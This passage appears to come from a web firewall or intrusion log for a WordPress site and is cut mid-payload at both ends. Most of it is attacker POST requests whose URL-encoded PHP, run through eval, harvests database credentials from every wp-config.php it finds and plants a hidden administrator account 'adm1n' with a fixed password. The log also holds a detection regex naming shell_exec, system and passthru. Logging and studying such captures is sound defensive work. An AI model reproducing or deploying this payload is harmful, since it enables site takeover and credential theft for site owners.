0%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/html-api\/class-wp-html-token.php HTTP\/1.1\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:12663\nhost:dewenlabels.com\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept:*\/*\naccept-encoding:gzip,deflate\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\n\netswnK=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 12:12:44","213.209.159.254","POST","\/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> KX:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-length:12640\ncontent-type:application\/x-www-form-urlencoded\ncookie:4=1e9e32e066be8d516ba04b54073ce441; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvF1tvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAfLKAmMKZvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15\n\nKX=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%2